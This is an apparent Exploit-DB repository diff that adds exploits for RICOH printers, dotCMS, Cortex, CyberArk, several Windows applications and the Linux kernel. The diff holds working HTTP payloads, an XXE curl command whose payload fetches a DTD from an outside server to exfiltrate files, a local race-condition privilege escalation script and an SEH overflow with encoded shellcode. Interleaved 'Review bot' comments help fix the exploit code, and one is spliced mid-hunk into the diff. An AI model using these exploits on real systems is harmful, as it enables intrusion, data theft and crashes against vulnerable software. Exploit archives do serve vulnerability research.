diff --git a/exploits/hardware/webapps/46826.txt b/exploits/hardware/webapps/46826.txt
new file mode 100644
index 000000000..2d921c269
--- /dev/null
+++ b/exploits/hardware/webapps/46826.txt
@@ -0,0 +1,42 @@
+# Exploit Title: RICOH SP 4510DN Printer - HTML Injection
+# Date: 2019-05-06
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
+# Software: RICOH Printer
+# Product Version: SP 4510DN
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: CVE-2019-11845
+
+# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 102
+DNT: 1
+Connection: close
+Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857
+
+mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Mon, 06 May 2019 11:42:46 GMT
+Server: Web-Server/3.0
+Content-Type: text/plain
+Expires: Mon, 06 May 2019 11:42:46 GMT
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+[14]
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46827.txt b/exploits/hardware/webapps/46827.txt
new file mode 100644
index 000000000..6b2972d90
--- /dev/null
+++ b/exploits/hardware/webapps/46827.txt
@@ -0,0 +1,43 @@
+# Exploit Title: RICOH SP 4520DN Printer - HTML Injection
+# Date: 2019-05-06
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
+# Software: RICOH Printer
+# Product Version: SP 4520DN
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: CVE-2019-11844
+
+# An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi
+# entryNameIn or entryDisplayNameIn parameter.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 219
+DNT: 1
+Connection: close
+Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008
+
+mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Mon, 06 May 2019 11:00:09 GMT
+Server: Web-Server/3.0
+Content-Type: text/plain
+Expires: Mon, 06 May 2019 11:00:09 GMT
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+[14]
\ No newline at end of file
diff --git a/exploits/jsp/webapps/46825.txt b/exploits/jsp/webapps/46825.txt
new file mode 100644
index 000000000..a41de9e9d
--- /dev/null
+++ b/exploits/jsp/webapps/46825.txt
@@ -0,0 +1,37 @@
+# Exploit Title: dotCMS 5.1.1 - HTML Injection
+# Date: 2019-05-09
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://dotcms.com/
+# Software Link: https://github.com/dotCMS
+# Software: dotCMS
+# Product Version: 5.1.1
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection and Cross-site Scripting
+# CVE: CVE-2019-11846
+
+# HTTP POST Request :
+
+POST /servlets/ajax_file_upload?fieldName=binary3 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://TARGET/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=site-browser&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=site-browser&p_p_mode=view&_site_browser_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_site_browser_cmd=new&selectedStructure=33888b6f-7a8e-4069-b1b6-5c1aa9d0a48d&folder=SYSTEM_FOLDER&referer=/c/portal/layout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dsite-browser%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsite-browser%26p_p_mode%3Dview%26_site_browser_struts_action%3D%252Fext%252Fbrowser%252Fview_browser&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=site-browser
+Content-Type: multipart/form-data; boundary=---------------------------5890268631313811380287956669
+Content-Length: 101313
+DNT: 1
+Connection: close
+Cookie: messagesUtk=2366e7c3b5af4c8c93bb11d0c994848a; BACKENDID=172.18.0.3; JSESSIONID=65C16EFBEE5B7176B22083A0CA451F0A.c16f6b7d05d9; hs-messages-hide-welcome-message=true; access_token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJkZGFlZmEzNS0yYmMyLTQ4MTEtOTRjNi0xNGE0OTk4YzFkNDAiLCJpYXQiOjE1NTczOTY0NzYsInVwZGF0ZWRfYXQiOjEyMDQ4MjQ5NjEwMDAsInN1YiI6ImRvdGNtcy5vcmcuMSIsImlzcyI6IjRiNTkyYjIyLTBiMmEtNGI2ZC05NmU4LTdjMzBiMzgzOTM1ZiJ9.F8_L_Cu96pkYcwTl4ex_zfrA-Fk-rqNUz24oCV0gOmc; DWRSESSIONID=EZToDkzmi*mMXCayMxskFA75sGm
+Upgrade-Insecure-Requests: 1
+
+-----------------------------5890268631313811380287956669
+Content-Disposition: form-data; name="binary3FileUpload"; filename="\"> .json"
+Content-Type: application/json
+
+# HTTP Response :
+
+HTTP/1.1 200
+Content-Length: 0
+Date: Thu, 09 May 2019 10:23:44 GMT
+Connection: close
\ No newline at end of file
diff --git a/exploits/linux/local/9844.py b/exploits/linux/local/9844.py
index 26efab184..0198ba29b 100755
--- a/exploits/linux/local/9844.py
+++ b/exploits/linux/local/9844.py
@@ -1,13 +1,14 @@
-# This is a PoC based off the PoC release by Earl Chew
+# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
 # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
 # PoC by Matthew Bergin
 # Bugtraq ID: 36901
 #
-# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/82/files
+# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files
 import os
 import time
 import random
+import subprocess
 #infinite loop
 i = 0
 x = 0
@@ -15,7 +16,9 @@ while (i == 0):
 os.system("sleep 1")
 while (x == 0):
 time.sleep(random.random()) #random int 0.0-1.0
- pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
+ p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True)
+ result = p.stdout.read()
+ pid = result.replace('\n', '').replace('\r', '')
 if (pid == "0"): #need an active pid, race condition applies
 print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
 break
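Review bot: The retry guard `if (pid == "0"):` no longer matches the failure case once the PID comes from captured pipe output instead of the return status of the removed `os.system` call: when the grep pipeline matches nothing, `result` is empty and `pid` becomes `""`, so the check never fires and the loop carries on with an empty PID despite the `#need an active pid` comment. Each iteration also leaves the child unreaped, because `p.stdout.read()` is never followed by `p.wait()`; `result, _ = p.communicate()` reads and reaps in one step. A guard of `if not pid or pid == "0":` would cover both the old and the new failure value. The enclosing `while` loops begin and end outside the hunk.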
diff --git a/exploits/multiple/webapps/46820.txt b/exploits/multiple/webapps/46820.txt
new file mode 100644
index 000000000..23e6c50cd
--- /dev/null
+++ b/exploits/multiple/webapps/46820.txt
@@ -0,0 +1,31 @@
+# Exploit Title: SSRF in TheHive Project Cortex <= 2.1.3
+# Date: 2/26/2019
+# Exploit Author: Alexandre Basquin
+# Vendor Homepage: https://blog.thehive-project.org
+# Software Link: https://github.com/TheHive-Project/Cortex
+# Version: Cortex <= 2.1.3
+# Tested on: 2.1.3
+# CVE : CVE-2019-7652
+
+# Exploit description
+
+TheHive Project Cortex version <= 2.1.3 is vulnerable to a SSRF vulnerability in the "UnshortenLink_1_0" analyzer.
+
+References:
+
+https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
+
+
+
+POC:
+
+1. Create a new analysis
+
+2. Select Data Type "URL"
+
+3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22")
+
+4. Result can be seen in the main dashboard.
+
+
+Reported to TheHive Project by Alexandre Basquin on 1/24/2019
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46828.txt b/exploits/multiple/webapps/46828.txt
new file mode 100644
index 000000000..a2d5193b8
--- /dev/null
+++ b/exploits/multiple/webapps/46828.txt
@@ -0,0 +1,97 @@
+# Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML
+authentication
+# Date: 10/05/2019
+# Exploit Author: Marcelo Toran (@spamv)
+# Vendor Homepage: https://www.cyberark.com
+# Version: <=10.7
+# CVE : CVE-2019-7442
+
+
+-----------Product description
+The CyberArk Enterprise Password Vault is a privileged access security
+solution to store, monitor and rotate credentials. The main objective
+of the solution is protecting the privileged accounts that are used to
+administrate the systems of the organisations.
+
+-----------Vulnerability description
+This vulnerability allows remote attackers to disclose sensitive
+information or potentially bypass the authentication system.
+
+-----------Vulnerability Details
+# Exploit Title: XML External Entity (XXE) Injection in SAML authentication
+# Affected Component: Password Vault Web Access (PVWA)
+# Affected Version: <=10.7
+# Vendor: CyberArk
+# Vendor Homepage: https://www.cyberark.com
+# Date: 18/12/2018
+# CVSS Base Score: 7.5 (High)
+# CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+# Exploit Author: Marcelo Torán (Nixu Corporation)
+# CVE: CVE-2019-7442
+# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442
+
+-----------Technical Description
+It has been found that the XML parser of the SAML authentication
+system of the Password Vault Web Access (PVWA) is vulnerable to XML
+External Entity (XXE) attacks via a crafted DTD. No user interaction
+or privileges are required as the vulnerability is triggered in
+pre-authentication.
+The vulnerable component is: https://example.com/PasswordVault/auth/saml
+The vulnerable argument: SAMLResponse
+
+-----------POC
+
+# pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration:
+
+">
+
+
+# The malicious XML payload where is defined the address of the external entity defined in the previous step:
+
+
+%sp;
+
+%param1;
+
+]>
+&exfil;
+
+
+# XML payload base64 encoded + equal symbols URL encoded:
+PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d
+
+
+# CURL command to exploit the XXE:
+curl -i -s -k -X $'POST' \
+ -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \
+ $'https://example.com/PasswordVault/auth/saml/'
+
+
+# Checking the logs of the external server:
+example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 -
+example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 -
+
+
+# And decoding the content of the logs it's possible to read the requested file of the machine:
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+-----------Timeline
+18/12/2018 – Vulnerability discovered
+10/01/2019 – Vendor notified
+23/01/2019 – Vulnerability accepted
+05/02/2019 – CVE number requested
+05/02/2019 – CVE number assigned
+19/02/2019 – Vendor released a patch
+19/02/2019 – Advisory released
+
+-----------Proof of Concept (PoC)
+
+https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/
\ No newline at end of file
diff --git a/exploits/windows/dos/46819.py b/exploits/windows/dos/46819.py
new file mode 100755
index 000000000..e6d1f8ca8
--- /dev/null
+++ b/exploits/windows/dos/46819.py
@@ -0,0 +1,22 @@
+#Exploit Title: jetCast Server 2.0 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: http://www.jetaudio.com/
+#Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
+#Tested Version: 2.0
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: jetCast_Server_2.0.py
+#2.- Open jetCast.txt and copy content to clipboard
+#2.- Open jetCast Server
+#3.- Select Config
+#4.- In "Log directory" Paste ClipBoard
+#5.- Click on "Ok"
+#6.- Click on "Start"
+#7.- Crashed
+
+cod = "\x41" * 5000
+f = open('jetCast.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46821.py b/exploits/windows/dos/46821.py
new file mode 100755
index 000000000..971815381
--- /dev/null
+++ b/exploits/windows/dos/46821.py
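Review bot: The output file at the end of the 46819.py hunk is written with a bare `open` / `f.close()` pair instead of a context manager, so the handle is left open if `f.write` raises; `with open('jetCast.txt', 'w') as f:` followed by `    f.write(cod)` is the idiomatic form and needs no explicit close. The same pattern appears in the 46821.py, 46822.py, 46823.py and 46824.py hunks of this commit. The step list in this file's header also numbers two consecutive steps `#2.-`, so the steps would read better renumbered 1 through 8.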
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
+# Date: 09/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
+# Version: 2.2
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
+# 2.- Copy the text from the generated SpotIM.txt file to clipboard
+# 3.- Open SpotIM
+# 4. Select "Register" > "Enter Registration Code..."
+# 5.- Paste clipboard in the Name/Key field
+# 6.- Click 'OK'
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("SpotIM.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46822.py b/exploits/windows/dos/46822.py
new file mode 100755
index 000000000..aa6d9497b
--- /dev/null
+++ b/exploits/windows/dos/46822.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
+# Date: 09/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
+# Version: 1.1.5
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
+# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
+# 3.- Open SpotPalTalk
+# 4. Select "Register" > "Enter Registration Code..."
+# 5.- Paste clipboard in the Name/Key field
+# 6.- Click 'OK'
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("SpotPaltalk.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46823.py b/exploits/windows/dos/46823.py
new file mode 100755
index 000000000..4a8a2c031
--- /dev/null
+++ b/exploits/windows/dos/46823.py
@@ -0,0 +1,22 @@
+#Exploit Title: ASPRunner.NET 10.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: https://xlinesoft.com/
+#Software Link: https://xlinesoft.com/asprunnernet/download.htm
+#Tested Version: 10.1
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ASPRunner_net_10_1.py
+#2.- Open ASPRunner_10_1.txt and copy content to clipboard
+#3.- Open ASPRunner.NET
+#4.- Click on "Next" > Select "SQLite" database > click on "Next"
+#5.- Click on "Create new database"
+#6.- In "Table name" field Paste Clipboarad
+#7.- Click on "Create table"
+#8.- Crashed
+
+cod = "\x41" * 10000
+f = open('ASPRunner_10_1.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46824.py b/exploits/windows/dos/46824.py
new file mode 100755
index 000000000..7765c8716
--- /dev/null
+++ b/exploits/windows/dos/46824.py
@@ -0,0 +1,22 @@
+#Exploit Title: PHPRunner 10.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: https://xlinesoft.com/
+#Software Link: https://xlinesoft.com/phprunner/download.htm
+#Tested Version: 10.1
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: PHPRunner_10_1.py
+#2.- Open PHPRunner_10_1.txt and copy content to clipboard
+#3.- Open PHPRunner
+#4.- Click on "Next" > Select "Microsoft Access" database > click on "Next"
+#5.- Click on "Create new database" > click on "Create table"
+#6.- Select "Create dashboard" > in "Name" field Paste Clipboarad
+#7.- Click on "Ok"
+#8.- Crashed
+
+cod = "\x41" * 10000
+f = open('PHPRunner_10_1.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46805.py b/exploits/windows/local/46805.py
index f66960153..bbe36fa26 100755
--- a/exploits/windows/local/46805.py
+++ b/exploits/windows/local/46805.py
@@ -1,4 +1,4 @@
-# Title: Admin Express v1.2.5.485 Folder Path Local SEH Alphanumeric Encoded Buffer Overflow
+# Title: Admin Express v1.2.5.485 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow
 # Date: May 6th, 2019
 # Author: Connor McGarr (https://connormcgarr.github.io)
 # Vendor Homepage: https://admin-express.en.softonic.com/
@@ -9,14 +9,19 @@
 # TO RUN:
 # 1. Run python script
 # 2. Copy contents of pwn.txt
-# 3. Open AdminExpress
+# 3. Open Admin Express
 # 4. Select System Compare
-# 5. Paste contents into Folder Path on the left hand side
-# 6. Press the scale icon in the middle of the screen, under the Services and Running Processes tabs
+# 5. Paste contents into the left-hand side Folder Path field
+# 6. Click the scale icon in the middle of the screen, under the Services and Running Processes tabs
-# This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode.
-# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
+# This got a bit hairy. We manually encoded our shellcode and had to use the sub method for encoding each line of payload.
+# 05 was a bad character for us, which is an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
+
+# Can replace with a shell, if you are willing to do the encoding and decoding math Too preoccupied for now, so here is calc.exe
+# You would need to use logical AND plus the sub eax opcodes to get a value on the stack that could jump back to the A buffer, where there is
+# much more room. Then you would need to align the stack with the stack pointer value you need (not 0x012F3F4 as used below) and write to the stack upwards.
+# You should have enough room for all of the logical AND plus sub eax commands to get a full-sized shell payload on the stack.
 # calc.exe shellcode:
 # "\x31\xc9\x51\x68"
@@ -24,87 +29,85 @@
 # "\x54\xB8\xc7\x93"
 # "\xc2\x77\xff\xd0"
-# Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe
-# You would need to use logicla AND and the SUB EAX opcodes to get a value on the stack that could jump back to the A buffer, where there is
-# much more room. Then you would need to align the stack with the value you need (not 0x012F3F4 as used below), and write upwards on the stack.
-# You should have enough room for all of the logical AND and SUB EAX commands to get a full shell on the stack.
-
 # For zeroing out registers before manual shellcode
 zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101
 zero += "\x25\x10\x10\x10\x10" # and eax, 0x10101010
-# For restoring stack pointer before execution of shellcode, due to
-# old stack pointer value needed. This puts 0x0012DC98 into ECX, to be used later
-restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
-restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.)
-restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later)
+# We need to save the current stack pointer before execution of shellcode, due to
+# old stack pointer value needed when executing our payload of calc.exe. This puts the current stack pointer 0x0012DC98 into ECX, to be used later
+restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
+restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.)
+restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later)
 # Stack alignment
 # Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
 # After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
-alignment = "\x54" # push esp
-alignment += "\x58" # pop eax; (puts the value of ESP into EAX)
+alignment = "\x54" # push esp
+alignment += "\x58" # pop eax; (puts the value of ESP into EAX)
-# Write these 3 sub values in normal format, since memory address, not instruction to be executed.
+# Write these 3 sub values in normal format, since memory address, not instruction to be executed. You do not have to do
+# it this way, but I do my calculations in normal format to remind me it is a memory address, when doing hex max. For my
+# other operations, I used little endian. If you do all of the calculations in one way, you do not need to flip the sub
+# math difference results. This is how I keep things straight
 # 384D5555 364D5555 364E5555
-alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555
-alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555
-alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555
-alignment += "\x50" # push eax
-alignment += "\x5c" # pop esp; (puts the value of eax back into esp)
+alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555
+alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555
+alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555
+alignment += "\x50" # push eax
+alignment += "\x5c" # pop esp; (puts the value of eax back into esp)
 # calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
 # 1st line = 2C552D14 01552D14 01562E16
 shellcode = zero
-shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14
-shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14
-shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16
-shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one.
+shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14
+shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14
+shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16
+shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one.
 # 2nd line = 24121729 24121739 2414194A
 shellcode += zero
-shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729
+shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729
 shellcode += "\x2d\x39\x17\x12\x24" # sub eax, 0x24121739
 shellcode += "\x2d\x4a\x19\x14\x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
-shellcode += "\x50" # push eax
+shellcode += "\x50" # push eax
 # 3rd line = 34313635 34313434 34313434
 shellcode += zero
-shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635
-shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
-shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
-shellcode += "\x50" # push eax
+shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x50" # push eax
 # 4th line = 323A1245 323A1245 333A1245
 shellcode += zero
-shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
-shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
-shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245
-shellcode += "\x50" # push eax
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245
+shellcode += "\x50" # push eax
 # We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall,
-# We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!)
+# we need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!).
 # Here are the 3 values: 403F2711 3F3F2711 3F3F2811
 move = zero
-move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x3F3F2711
-move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711
-move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811
-move += "\x50" # push eax
+move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711
+move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811
+move += "\x50" # push eax
 # All together now.
 payload = "\x41" * 4260
-payload += "\x70\x7e\x71\x7e" # JO 126 hex bytes. If jump fails, default to JNO 126 hex bytes
-payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL
+payload += "\x70\x7e\x71\x7e" # JO 126 bytes. If jump fails, default to JNO 126 bytes
+payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL
 # There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them
 # so we have enough room for our shellcode and to decode.
-payload += "\x41" * 122 # add padding since we jumped 7e (126 bytes) above
-payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 122 # add padding since we jumped 7e hex bytes (126 bytes) above
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
 payload += "\x41" * 124
-payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
 payload += "\x41" * 124
-payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes
-payload += "\x41" * 121 # NOP is in the restricted chars. Using \x41 as a slide into alignment
+payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes
+payload += "\x41" * 121 # NOP is in the restricted characters. Using \x41 as a slide into alignment
 payload += restore
 payload += alignment
 payload += shellcode
diff --git a/files_exploits.csv b/files_exploits.csv
index 5ef1b02b1..7e9706243 100644
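Review bot: The comment on the second `sub` of the 1st-line group still reads `# sub eax, 0x01562D14`, but the bytes `\x2d\x14\x2d\x55\x01` encode 0x01552D14 under the little-endian convention the file's own comment says it uses for the shellcode lines, and 01552D14 is also the value listed in the `# 1st line = 2C552D14 01552D14 01562E16` header; this hunk fixed the analogous `0x403F2711` comment on the `move` line but left this one. Suggested: `shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01552D14`. The earlier hunk's rewritten comment `decoding math Too preoccupied for now` also lost its sentence break, so a period after `math` would read better.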
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6413,7 +6413,12 @@ id,file,description,date,author,type,platform,port
 46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
 46816,exploits/windows/dos/46816.py,"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
